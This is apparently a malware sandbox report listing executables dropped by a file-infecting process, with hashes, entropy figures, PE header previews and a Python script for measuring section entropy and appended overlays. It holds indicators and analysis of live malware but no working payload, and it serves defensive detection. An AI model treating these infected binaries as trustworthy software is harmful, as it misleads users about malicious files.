                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$......2.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4117823093285535
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IGqVwCto1Gm5WgisqjnhMgeiCl7G0nehbGZpbD:1Z1GmUJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:D7B5FF4EDDBA951921A1E90FA7CFF0CB
                                                                                                                                                                                                                                                                                                                                                    SHA1:BBADE83AADAC25DD838A40840599D5E0B2C0BE11
                                                                                                                                                                                                                                                                                                                                                    SHA-256:77BF2C2A8635C8F833E3227163E5AECBDFFEBE403BD5BD0097BE6EE1400981E3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C430BB83DFA30B0722B299C2D9ECE23C88D3C4E61013AF7371E38EF3D284566C2E25F7D3BEEDE92C116D311FBC36F838AA7E445C811EA9C7CE63046D8527B350
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.....................................+.... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.157413738618747
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:iWBWeXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iWBWesqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:A08492763E07C7F7B57FD1F172FA536F
                                                                                                                                                                                                                                                                                                                                                    SHA1:EDFF949E007276FA7C3B3DD5E2239536E153899F
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2848E2B1F82214640E213574DF69C3D96BA218F12EB24622CFC61E97359FBD63
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8E572ED55417BF9FE2B125F9E2D7600A24DDCF87706372B31B11CB86C83F28B680B8B440B1BC3864211924AB0CBB03814E24D72173925900F9EB47080CA4A6A1
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.228506490026996
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Yf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0hsqjnhMgeiCl7G0nehbGZpbD:Y+GtCi27mVTyT+a01Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:ADB7A4E816746A3192D1E4ABBF62AD6C
                                                                                                                                                                                                                                                                                                                                                    SHA1:85356C98C64E66FDECB57B1921F17C4B88ADF4B5
                                                                                                                                                                                                                                                                                                                                                    SHA-256:EAB28BC7D03F94E795471937BA5F903CAAF0D9DC75C36FB3F887DF98031B4CC1
                                                                                                                                                                                                                                                                                                                                                    SHA-512:16B4F88A5030D0FC6B2CD3F153A44847ED9AB9CEE89D86E64DEC151B5F8182F94FAD0FDAFCDA59CD280ADC9CDE1F4DC8750DA7B7583577F9C4FB1E62A0F0669B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................V..... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.649669731793724
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:wU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYuDmg27RnWGj:R2NfHOIK5Ns6qR94D527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:B6126E0935004AC535FC1E223F3CAF0E
                                                                                                                                                                                                                                                                                                                                                    SHA1:3BC2D76C3497F3BF49F26C77E99A6D61F9B495B7
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6432C128FDFE51588159DB6132CED87508DC77AA799ADCBEE80CA0E68C7C057D
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8380A6BA9796CCDE698EA57A783B1A8441680B2648E35957BCAC57DD510EA0B2ED337D2D1D0B28CEC19FEDB877C7DCCDF397BE322E92B6F3E621532ED7D5BD31
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1588224
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.531931340032479
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IkcWTUQcydSsqjnhMgeiCl7G0nehbGZpbD:IhKUtDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:A5F6BDFE42B0EE95F5AFF9A957612817
                                                                                                                                                                                                                                                                                                                                                    SHA1:323805CCB29CEAE1945B9D7634A8F47828F66C04
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D522E29E041FDD123FB0C2B4EBD10451F37E80E29D2469EDE264EA71A075727E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:FA02828C2441C34BC6E8272017B4DBA7BDBD8E34AA32C5B5512AAE1999A6356E184E5C31137D654515D94A8135E25EAD0CBB0BE9AAA090E506B8042D89012590
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1338368
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.352660719285533
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:+fY+FUBxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+A+qBxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:ADC9453771970D13FC9008207ADA8CC0
                                                                                                                                                                                                                                                                                                                                                    SHA1:AE4397FAAA173925BA5B5C7663D0FBD9292EBB79
                                                                                                                                                                                                                                                                                                                                                    SHA-256:32B877C103440A623E5716292468EB3D4964A6B9B044996D6B1AF8B4954A8186
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5E4097881FF9835D6FC9B548E423DDCBA4923C9AA0B33B77AA2230B500BE7A170D2ABA5C0C42A0AC26E9F0F5D9871D880F3AE411DD4AEB23F77D129CCA51A251
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................SO..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1143296
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.022667349271153
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:KsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:ABF15912E4DE786DBA2508C829972746
                                                                                                                                                                                                                                                                                                                                                    SHA1:55412FF536158F77929D0D757AE8373FF8181A3A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:FB21685BD1766FA444AB87E3AA139E7CDEF7A4B1F2FC780CA4CEAACD00BF372B
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C2AD016D76DD4E3772224342FC152D1F4D4641EB846CCE7269F17EDDE088262B5F28775CAA5442C11E20FC4BAD6ECB9443FF2A3939E102EF1E31288509801BFA
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.......................................... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1161728
Entropy (8bit):5.047155139786877
Encrypted:false
SSDEEP:12288:+lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:usqjnhMgeiCl7G0nehbGZpbD
MD5:990282B8462FD514A938283673AC5B24
SHA1:10A9EF9264A80F710283A20B25581A9147DED69B
SHA-256:124E12FFFAD85A88A92266C0EE860334E04F76E801476CE37765A3791AFF70AF
SHA-512:0FA7AC27907AF3928B86B4E9D8DA7363750E6C07BE903792B5C5CA20CF566EF3EFF2C377039221276752FA7E45AECE8A43BED6A6C9BBD0BA20D90304F4BBC9CC
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.....................................\.... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.499792574952584
Encrypted:false
SSDEEP:49152:HtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755EDmg27RN:HjEIa4HIEWOc5OD527BWG
MD5:6509BE0BCC5204E7E614405D9EC9C108
SHA1:0C19C41935CBD1970A84DA090B6528C831EFF6B0
SHA-256:8DA873DD2E5BB5368AD5AB0922BB6EB24FEBE34F80A422304A132F79E821E8FF
SHA-512:DB07BECEBDF482A0E0C240A2F4BA7AFC4240AC0029FFB20B588A1DD1FF51C296890387471DB59F47F06AED276AC02A0709308650BCF2AE23CDFCCB4B1C139B7E
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @..... .?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.999367305075901
Encrypted:true
SSDEEP:1572864:LQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:8XhwMhe6AABPiQwF6xQ22R
MD5:D7F0048E6C3849989FFF8E02D13FBB5D
SHA1:A8DF71C327B78D65CE69810DDE01C4B034B43C69
SHA-256:9867BB5D594583A6F6C3C1DAD4A987DA717F09BB6597A4EC72D321AA569F2C69
SHA-512:476D9445534FFB193D4BA9DDD52972BDE9718C0425FADA86C2ADE479683A5D76A5070FAFA25A8F9CED7B801A019EE56D689FFEC8BC86D029E48ADED0DACCF80B
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......h..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1230336
Entropy (8bit):5.185602082284152
Encrypted:false
SSDEEP:12288:HejVWYUAlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+jkY7lsqjnhMgeiCl7G0nehbGZpbD
MD5:E936C41AE165EDE0FB5703744BE192DC
SHA1:4CEC7729F68F215F7780B52C59A5B0562BD196F6
SHA-256:7B4761F43AE59AA9663979A62B5FB91A3C1C972CD16DF910A301CD48B96A7334
SHA-512:E24FF393A20FD85A9DC0469C00142A4B81428ACE2EB70F23B49D403CFD390D8ADD8ED090C177D9A10DFBEDE5DEBD40F5C0CF5AEA4E4D22402A7B63B63DC51592
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................{........................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1384960
Entropy (8bit):5.377807743431448
Encrypted:false
SSDEEP:24576:WxwSJhkrmZs5sqjnhMgeiCl7G0nehbGZpbD:Wy+krKs9Dmg27RnWGj
MD5:EAF25D6D16DA10A79E0EB0873D7EAC72
SHA1:06A636FB4A9125537872BB793316FBF213D7D158
SHA-256:E6EB1189C1F3F3BB1AF1D1E75300577A133D9690187BBEE68E223A50878DB066
SHA-512:D28E81A1497BEB634DBBC3B19DFC431FA50F9AB2CE338FF2AD0FD9D80F3BE4A1F0E0DDC1F30DC30683A454A09A2082341D1F7735A81086AED6953BB3A14E0FE7
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@....................................(:.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................
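A note on reading the dropped-file entries above, with a worked example. Every file in this run was written by C:\Windows\System32\alg.exe, and four of the SSDEEP hashes end in the same chunk (sqjnhMgeiCl7G0nehbGZpbD) even though the files differ in size and in their leading chunks; that is the fingerprint of executables that differ at the front but end with the same appended data, which is consistent with the "Infects executable files" and "Drops large PE files" signatures in the report. The Encrypted field tracks entropy: the 59941376-byte drop at 7.999 is flagged true, the drops between 5.0 and 6.5 are not. The script below is an added example, not Joe Sandbox code: it recomputes the per-file fields shown here (File Type from the PE headers, size, 8-bit entropy, the four digests, an Encrypted flag) and adds two things the table does not show, per-section entropy and the overlay size (bytes past the last section), which is where an appended payload lands. The 7.9 entropy threshold is an assumption chosen to match the values on this page, and the minimal PE image the script builds is constructed test input, not any of the files listed.

```python
"""Recompute sandbox-style dropped-file metadata for a PE image, plus per-section
entropy and overlay size for spotting appended payloads in infected executables."""
import hashlib
import math
import struct

MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "Aarch64"}
SUBSYSTEMS = {2: "GUI", 3: "console"}
ENCRYPTED_ENTROPY = 7.9  # assumption: threshold used here to mimic the report's Encrypted flag


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes):
    """Parse the DOS stub pointer, COFF header, optional-header magic/subsystem and the
    section table. Returns None when the buffer is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]            # 0x10B = PE32, 0x20B = PE32+
    subsystem = struct.unpack_from("<H", data, opt + 0x44)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        if off + 40 > len(data):
            break  # truncated section table: stop rather than read past the buffer
        name = data[off:off + 8].rstrip(b"\x00").decode("ascii", "replace")
        _, _, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append((name, raw_ptr, raw_size))
    return {"machine": machine, "magic": magic, "subsystem": subsystem, "sections": sections}


def describe_pe(data: bytes):
    """File Type string in the style the report uses, or None for non-PE input."""
    pe = parse_pe(data)
    if pe is None:
        return None
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(pe["magic"], "PE")
    sub = SUBSYSTEMS.get(pe["subsystem"], "subsystem %d" % pe["subsystem"])
    arch = MACHINES.get(pe["machine"], hex(pe["machine"]))
    return f"{fmt} executable ({sub}) {arch}, for MS Windows"


def analyze(data: bytes) -> dict:
    """Whole-file fields as in the report, plus section entropies and overlay size."""
    info = {
        "file_type": describe_pe(data),
        "size": len(data),
        "entropy": shannon_entropy(data),
        "digests": {n: hashlib.new(n, data).hexdigest().upper()
                    for n in ("md5", "sha1", "sha256", "sha512")},
    }
    info["encrypted"] = info["entropy"] >= ENCRYPTED_ENTROPY
    pe = parse_pe(data)
    if pe:
        info["sections"] = [(name, shannon_entropy(data[ptr:ptr + size]))
                            for name, ptr, size in pe["sections"]]
        end = max((ptr + size for _, ptr, size in pe["sections"]), default=0)
        info["overlay_size"] = max(0, len(data) - end)  # data appended after the last section
    return info


def build_minimal_pe(machine=0x8664, magic=0x20B, subsystem=2, payload=b"\x00" * 512) -> bytes:
    """Constructed test input: a minimal, non-runnable PE image with one .text section.
    It is not any of the files in the report."""
    e_lfanew, opt_size = 0x80, 0xF0 if magic == 0x20B else 0xE0
    dos = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x22)
    opt = (struct.pack("<H", magic) + b"\x00" * 0x42 + struct.pack("<H", subsystem)).ljust(opt_size, b"\x00")
    sect = b".text".ljust(8, b"\x00") + struct.pack("<IIII", len(payload), 0x1000, len(payload), 0x200) + b"\x00" * 16
    return (dos + b"PE\x00\x00" + coff + opt + sect).ljust(0x200, b"\x00") + payload


if __name__ == "__main__":
    sample = build_minimal_pe() + b"X" * 100  # 100-byte overlay to show appended data
    for k, v in analyze(sample).items():
        print(k, v)
```

Run it over a real dropped file with `analyze(open(path, "rb").read())`; a low-entropy host program whose overlay or last section scores near 8.0 is the pattern to expect when the report says a file infector appended its payload. The per-section view matters because whole-file entropy averages a large clean host against a small packed blob and can stay well under any threshold, as the 5.0-6.5 entries above show.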
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1649152
Entropy (8bit):5.632741003375491
Encrypted:false
SSDEEP:24576:yHQJLIRgvsnNksqjnhMgeiCl7G0nehbGZpbD:yHQJL34ADmg27RnWGj
MD5:7C963A4D46D6A3FB0D24C6F74917B152
SHA1:48537B1A4FB8FBBF25D07DF5887BB915E0E40A34
SHA-256:E3260282248E78F0F4AEDC392A84090EB8234AD86B8341AC50B30423BE5D09C9
SHA-512:0F670189424F39B4A56EDCEF9F185814C76F1F5BF91DA636C0CB2297590F87C6AA066102B86526D41D7BF3C726F566FB58CCB9801CA7CAC2503000F68AA9531C
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5365760
Entropy (8bit):6.450980260075343
Encrypted:false
SSDEEP:49152:yUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kb:9WmXL6DEC7dRpKuDQbg3D527BWG
MD5:BA3DAC560E755BB4AC03779EB9FB5D1E
SHA1:8042C23BDACBB417D5A81D473EBC25B68CAFE295
SHA-256:19C35D36C6DD8E055C7CC530FF327E34E2D664A4EEAF4213580CE988202460B0
SHA-512:234391DC28E645B7E26055521BD9079B434096420028969C0E0DFC1F0675275B606B1C536F0AFA0D9D02ABA76D6A6894C3A9BD25D1AA15C9C7B390EAB1C1AFFB
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3163136
Entropy (8bit):7.972781380576439
Encrypted:false
SSDEEP:98304:BrZ23AbsK6Ro022JjL2WEiVqJZkD527BWG:lJADmmxL2WEoCZkVQBWG
MD5:367FA59F93030283A659A3D54D8483F4
SHA1:0CD3AC1CDCB5C7ABA1C58F40D736BA1BC84338B8
SHA-256:42BA8EF57A2C63656A67BB1379D41E866950DAD6CEAB336C4537B8058EE8AD89
SHA-512:4A6549242E9264E844A13EF5340B6F408BF4237047E23A3455F17BB100B5FAACC8C6498901401B53C4DD1309BFA3268227AC9ECAE4F6729EA7B9B2E03D52E050
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1213440
Entropy (8bit):7.20491558703228
Encrypted:false
SSDEEP:24576:CfrYY42wd7hlOw9fpkEE64JsqjnhMgeiCl7G0nehbGZpbD:bz9xrSNDmg27RnWGj
MD5:ECA0BAF0369ABCEA9224A9682E5C7A14
SHA1:80BAC72E5F0AC43665AF3AA2E321CA91E6D07C39
SHA-256:44507707D6A1D1CE2D3DB3239D0FF11C7C0F958F961535C01157C666F6871A7D
SHA-512:A089ED26F8DEF40421871FB4EF074384D462AA3ED954E862DEA0F994438D830DD889EC748CC37C360F8190AF816A4F6DC21C5F63A5F72C33819AD76ACAB4187E
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1388544
Entropy (8bit):5.272951600867957
Encrypted:false
SSDEEP:12288:VwkNKiZ+R2GGNUbTF56Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:VzNKUE56sqjnhMgeiCl7G0nehbGZpbD
MD5:FCB439513C71A05C5CEF3CA1FF7D8A74
SHA1:17F0E69D33F126B8B48DD57D5FC3CC55261C4E0E
SHA-256:FFBB506D5394E50CAD4291E1DB54FF1F755252E2233A34AE6E5EFCB74C458708
SHA-512:5F6429BC6D5FE10344D7C8F23163260148E22D70126B6942CD662B0956C75E4C7FEFC9E9A4837C1F8F2BEFACA95FE975D507C8FA600F1B24462256748E6045FB
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):5855744
Entropy (8bit):6.5743376040580515
Encrypted:false
SSDEEP:98304:WALuzDKnxCp3JKNrPJzruaI6HMaJTtGbbD527BWG:xaGg3cFPIaI6HMaJTtGbbVQBWG
MD5:6A67F4A8835DE567675F94C02BF96901
SHA1:DC0BA86A43ACC5E22B063CF6C2CCB8146916FD59
SHA-256:B435D2BAA750E46659CBFD974704EC9B00C22CA376BBB257C9190AE7651F0807
